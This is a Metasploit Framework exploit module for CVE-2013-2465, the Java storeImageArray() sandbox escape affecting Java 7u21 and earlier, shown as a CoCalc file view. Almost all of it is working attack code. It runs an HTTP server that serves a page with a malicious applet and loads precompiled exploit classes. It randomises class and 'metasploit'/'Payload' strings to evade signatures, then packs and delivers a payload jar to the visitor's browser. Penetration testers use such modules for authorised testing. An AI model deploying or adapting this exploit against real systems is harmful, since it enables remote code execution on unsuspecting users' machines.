CoCalc -- java_storeimagearray.rb

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/java_storeimagearray.rb
¹⁹⁹³⁴ views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = GreatRanking # Because there isn't click2play bypass, plus now Java Security Level High by default
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  # autopwn_info({ :javascript => false })
13

14
  def initialize(info = {})
15
    super(
16
      update_info(
17
        info,
18
        'Name' => 'Java storeImageArray() Invalid Array Indexing Vulnerability',
19
        'Description' => %q{
20
          This module abuses an Invalid Array Indexing Vulnerability on the
21
          static function storeImageArray() function in order to cause a
22
          memory corruption and escape the Java Sandbox. The vulnerability
23
          affects Java version 7u21 and earlier. The module, which doesn't bypass
24
          click2play, has been tested successfully on Java 7u21 on Windows and
25
          Linux systems.
26
        },
27
        'License' => MSF_LICENSE,
28
        'Author' => [
29
          'Unknown', # From PacketStorm
30
          'sinn3r', # Metasploit
31
          'juan vazquez' # Metasploit
32
        ],
33
        'References' => [
34
          [ 'CVE', '2013-2465' ],
35
          [ 'OSVDB', '96269' ],
36
          [ 'EDB', '27526' ],
37
          [ 'PACKETSTORM', '122777' ],
38
          [ 'URL', 'http://hg.openjdk.java.net/jdk7u/jdk7u-dev/jdk/rev/2a9c79db0040' ]
39
        ],
40
        'Platform' => %w{java linux win},
41
        'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
42
        'Targets' => [
43
          [
44
            'Generic (Java Payload)',
45
            {
46
              'Arch' => ARCH_JAVA,
47
              'Platform' => 'java'
48
            }
49
          ],
50
          [
51
            'Windows Universal',
52
            {
53
              'Arch' => ARCH_X86,
54
              'Platform' => 'win'
55
            }
56
          ],
57
          [
58
            'Linux x86',
59
            {
60
              'Arch' => ARCH_X86,
61
              'Platform' => 'linux'
62
            }
63
          ]
64
        ],
65
        'DefaultTarget' => 0,
66
        'DisclosureDate' => '2013-08-12',
67
        'Notes' => {
68
          'Reliability' => UNKNOWN_RELIABILITY,
69
          'Stability' => UNKNOWN_STABILITY,
70
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
71
        }
72
      )
73
    )
74
  end
75

76
  def setup
77
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit.class")
78
    @exploit_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
79
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorModel.class")
80
    @color_model_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
81
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-2465", "Exploit$MyColorSpace.class")
82
    @color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }
83

84
    @exploit_class_name = rand_text_alpha("Exploit".length)
85
    @color_model_class_name = rand_text_alpha("MyColorModel".length)
86
    @color_space_class_name = rand_text_alpha("MyColorSpace".length)
87

88
    @exploit_class.gsub!("Exploit", @exploit_class_name)
89
    @exploit_class.gsub!("MyColorModel", @color_model_class_name)
90
    @exploit_class.gsub!("MyColorSpace", @color_space_class_name)
91

92
    @color_model_class.gsub!("Exploit", @exploit_class_name)
93
    @color_model_class.gsub!("MyColorModel", @color_model_class_name)
94
    @color_model_class.gsub!("MyColorSpace", @color_space_class_name)
95

96
    @color_space_class.gsub!("Exploit", @exploit_class_name)
97
    @color_space_class.gsub!("MyColorModel", @color_model_class_name)
98
    @color_space_class.gsub!("MyColorSpace", @color_space_class_name)
99

100
    super
101
  end
102

103
  def on_request_uri(cli, request)
104
    vprint_status("Requesting: #{request.uri}")
105
    if request.uri !~ /\.jar$/i
106
      if not request.uri =~ /\/$/
107
        vprint_status("Sending redirect...")
108
        send_redirect(cli, "#{get_resource}/", '')
109
        return
110
      end
111

112
      print_status("Sending HTML...")
113
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
114
      return
115
    end
116

117
    print_status("Sending .jar file...")
118
    send_response(cli, generate_jar(cli), { 'Content-Type' => 'application/java-archive' })
119

120
    handler(cli)
121
  end
122

123
  def generate_html
124
    jar_name = rand_text_alpha(5 + rand(3))
125
    html = %Q|<html>
126
    <head>
127
    </head>
128
    <body>
129
    <applet archive="#{jar_name}.jar" code="#{@exploit_class_name}" width="1000" height="1000">
130
    </applet>
131
    </body>
132
    </html>
133
    |
134
    html = html.gsub(/^ {4}/, '')
135
    return html
136
  end
137

138
  def generate_jar(cli)
139
    p = regenerate_payload(cli)
140
    jar = p.encoded_jar
141

142
    jar.add_file("#{@exploit_class_name}.class", @exploit_class)
143
    jar.add_file("#{@exploit_class_name}$#{@color_model_class_name}.class", @color_model_class)
144
    jar.add_file("#{@exploit_class_name}$#{@color_space_class_name}.class", @color_space_class)
145
    metasploit_str = rand_text_alpha("metasploit".length)
146
    payload_str = rand_text_alpha("payload".length)
147
    jar.entries.each { |entry|
148
      entry.name.gsub!("metasploit", metasploit_str)
149
      entry.name.gsub!("Payload", payload_str)
150
      entry.data = entry.data.gsub("metasploit", metasploit_str)
151
      entry.data = entry.data.gsub("Payload", payload_str)
152
    }
153
    jar.build_manifest
154

155
    return jar.pack
156
  end
157
end
158

159
Product

Resources

Company
